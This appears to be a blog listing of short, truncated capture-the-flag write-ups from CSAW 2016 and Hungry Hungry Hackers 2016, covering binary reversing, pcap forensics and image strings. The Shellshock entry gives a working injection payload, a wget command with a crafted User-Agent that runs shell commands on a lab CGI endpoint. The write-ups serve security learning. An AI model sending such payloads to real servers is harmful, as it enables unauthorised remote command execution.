200 CSAW2016 Tutorial

Running the application there is immediately a seg fault. λ ./tutorial Segmentation fault (core dumped) Open in ida to see whats going on. void __fastcall __noreturn main(__int64 a1, char **a2, char **a3){ v15 = *MK_FP(__FS__, 40LL); optval = 1; sigemptyset(&v4); fd = socket(2, 1, 0); if ( fd…

50 CSAW2016 Warm-Up

check the run.sh script located in the docker folder We are given a executable to download with the description So you want to be a pwn-er huh? Well let's throw you an easy one ;) Check for the easy stuff Running files says its a 32 bit elf but before…

Hungry Hungry Hackers Shellshock

As the name suggests this is probably a shellshock vulnerability. You can test for it below Test wget -U "() { test;};echo \"Content-type: text/html\"; echo; echo; pwd;" http://10.10.10.54:8000/cgi-bin/board Basically the webserver is vulnerable to executing bash commands on the server. This means that…

Hungry Hungry Hackers 2016 Look Twice

Was given a pcap file of packet captures. Found a pdf that was transfered in the packets and was able to extract it. Then used binwalk on the pdf and the below is my bash output $ binwalk flag.pdf DECIMAL HEX DESCRIPTION -------------------------------------------- 0 0x0 gzip compressed data, $ ls 0…

Hungry Hungry Hackers 2016 Image Corupution

Just strings and grep $ strings flag.png | grep "flag" <photoshop:LayerName>The Flag is: ----------</photoshop:LayerName>…